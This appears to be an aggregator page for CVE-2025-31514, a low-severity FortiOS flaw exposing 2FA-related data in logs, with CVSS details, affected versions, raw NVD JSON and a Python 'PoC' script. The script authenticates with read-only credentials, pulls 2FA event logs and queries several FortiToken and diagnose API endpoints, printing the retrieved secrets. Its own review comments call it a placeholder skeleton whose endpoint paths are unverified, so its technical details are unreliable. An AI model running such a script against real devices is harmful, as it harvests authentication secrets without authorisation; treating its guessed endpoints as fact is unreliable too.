Security Vulnerability Report
CVE-2025-31514 CVSS 2.7 LOW

CVE-2025-31514

Published: 2025-10-14 16:15:38
Last Modified: 2025-10-15 17:17:04

Description

An Insertion of Sensitive Information into Log File vulnerability [CWE-532] in FortiOS 7.6.0 through 7.6.3, 7.4 all versions, 7.2 all versions, 7.0 all versions, 6.4 all versions may allow an attacker with at least read-only privileges to retrieve sensitive 2FA-related information via observing logs or via diagnose command.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* - VULNERABLE
FortiOS 7.6.0 - 7.6.3
FortiOS 7.4 (all versions)
FortiOS 7.2 (all versions)
FortiOS 7.0 (all versions)
FortiOS 6.4 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-31514 PoC - FortiOS Sensitive Information Disclosure via Logs
# This PoC demonstrates how an attacker with read-only privileges can
# retrieve sensitive 2FA-related information from FortiOS logs and diagnose commands.
#
# NOTE(review): as published, this script is a skeleton rather than a working
# demonstration: the CSRF token is a fixed placeholder, the target and
# credentials are placeholders, and none of the HTTP responses are checked
# before being parsed. It illustrates the *shape* of the issue (an
# authenticated low-privilege user reading logs / diagnostic output) and
# nothing more. The vendor advisory referenced on this page (FG-IR-24-452)
# is the authoritative source for fixed versions and mitigation.
import requests
import urllib3

# Suppresses the warning that would otherwise be printed on every request
# because certificate verification is disabled on the session below.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Placeholders; the script does nothing useful until these are replaced.
TARGET_HOST = "https://<fortios_target_ip>"
READONLY_USER = "readonly_user"
READONLY_PASS = "readonly_password"


class FortiOSLogExploit:
    """Drive a single authenticated HTTPS session against a FortiOS host.

    Holds the base URL, a ``requests.Session`` and the credentials; the
    individual methods issue GET/POST requests against fixed paths and
    return the parsed JSON bodies.
    """

    def __init__(self, host, username, password):
        # host: base URL including scheme, e.g. "https://<ip>" (no trailing slash,
        # since the methods concatenate paths starting with "/").
        self.host = host
        self.session = requests.Session()
        # TLS certificate verification is turned off for the whole session:
        # any certificate is accepted, so this session can be intercepted
        # by anything on the path. Acceptable only for a lab device with a
        # self-signed certificate.
        self.session.verify = False
        self.csrf_token = None
        self.username = username
        self.password = password

    def login(self):
        """Attempt to authenticate to the FortiOS web UI.

        Returns True when the POST to ``/logincheck`` answers with HTTP 200.
        Only the status code is inspected; the response body and the
        resulting session state are not, so True is not proof that a
        session was actually established.
        """
        # Step 1: Get CSRF token from login page
        # NOTE(review): the page is fetched but never read - ``login_page``
        # is unused below.
        login_page = self.session.get(f"{self.host}/login")
        # Extract CSRF token from the page (simplified)
        # NOTE(review): this is a literal placeholder, not an extracted
        # value, so the token sent in the form below is never valid.
        self.csrf_token = "extracted_csrf_token"
        # Step 2: Perform login with read-only credentials
        login_data = {
            "username": self.username,
            "secretkey": self.password,
            "csrfmiddlewaretoken": self.csrf_token
        }
        response = self.session.post(
            f"{self.host}/logincheck",
            data=login_data
        )
        return response.status_code == 200

    def retrieve_2fa_logs(self):
        """Fetch event logs through the REST log endpoint.

        Returns whatever ``response.json()`` yields for ``/api/v2/log/event/log``.
        The status code is not checked, so a non-JSON error page raises from
        ``.json()``; the caller also applies ``len()`` to the returned object,
        which counts top-level keys if the body is a JSON object rather than
        a list of entries.
        """
        # Method 1: Access logs via web interface - filter for 2FA events
        log_filter = {
            # NOTE(review): the page presents this logid range as the
            # authentication/2FA event range; that mapping is not verified here.
            "filter": "logid>=0100040000 AND logid<=0100049999",
        }
        response = self.session.get(
            f"{self.host}/api/v2/log/event/log",
            params=log_filter
        )
        return response.json()

    def execute_diagnose_command(self):
        """GET a fixed list of monitor-API paths and collect the JSON bodies.

        Returns a list of ``{"endpoint": path, "data": parsed_json}`` dicts,
        one per path that answered HTTP 200. A 200 response whose body is
        not JSON raises from ``.json()`` and aborts the loop.
        """
        # Method 2: Use diagnose commands available with read-only privileges
        # NOTE(review): these paths are reproduced as given on the page;
        # whether each exists on an affected FortiOS build is not established
        # by anything in this script.
        diagnose_endpoints = [
            "/api/v2/monitor/system/diagnose/fortitoken",
            "/api/v2/monitor/system/diagnose/auth",
            "/api/v2/monitor/system/diagnose/two-factor",
            "/api/v2/monitor/user/fortitoken"
        ]
        sensitive_data = []
        for endpoint in diagnose_endpoints:
            response = self.session.get(f"{self.host}{endpoint}")
            if response.status_code == 200:
                sensitive_data.append({
                    "endpoint": endpoint,
                    "data": response.json()
                })
        return sensitive_data

    def run_exploit(self):
        """Run the three steps in order and print the results to stdout.

        Stops after step 1 if ``login()`` returns False. Everything retrieved
        in steps 2 and 3 is written to stdout unredacted, so the terminal
        output itself becomes a copy of whatever sensitive data came back.
        """
        print("[*] CVE-2025-31514 - FortiOS 2FA Info Disclosure")
        print(f"[*] Target: {self.host}")
        # Step 1: Login with read-only credentials
        print("\n[+] Step 1: Authenticating with read-only credentials...")
        if self.login():
            print("[+] Login successful!")
        else:
            print("[-] Login failed!")
            return
        # Step 2: Retrieve 2FA logs
        print("\n[+] Step 2: Retrieving 2FA-related logs...")
        logs = self.retrieve_2fa_logs()
        # NOTE(review): ``logs`` is the raw JSON body, so this count is only
        # meaningful if the endpoint returns a top-level list.
        print(f"[+] Found {len(logs)} log entries containing 2FA info")
        # Step 3: Execute diagnose commands
        print("\n[+] Step 3: Executing diagnose commands...")
        diagnose_data = self.execute_diagnose_command()
        print(f"[+] Retrieved sensitive data from {len(diagnose_data)} endpoints")
        # Output extracted sensitive information
        print("\n[*] Extracted Sensitive 2FA Information:")
        for data in diagnose_data:
            print(f" Endpoint: {data['endpoint']}")
            print(f" Data: {data['data']}")


if __name__ == "__main__":
    # Runs against the placeholder constants defined at the top of the file.
    exploit = FortiOSLogExploit(TARGET_HOST, READONLY_USER, READONLY_PASS)
    exploit.run_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31514", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:37.587", "lastModified": "2025-10-15T17:17:03.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Insertion of Sensitive Information into Log File vulnerability [CWE-532] in FortiOS 7.6.0 through 7.6.3, 7.4 all versions, 7.2 all versions, 7.0 all versions, 6.4 all versions may allow an attacker with at least read-only privileges to retrieve sensitive 2FA-related information via observing logs or via diagnose command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "A70BE83D-8851-47DB-9360-B5B2E7CAE1ED"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-452", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}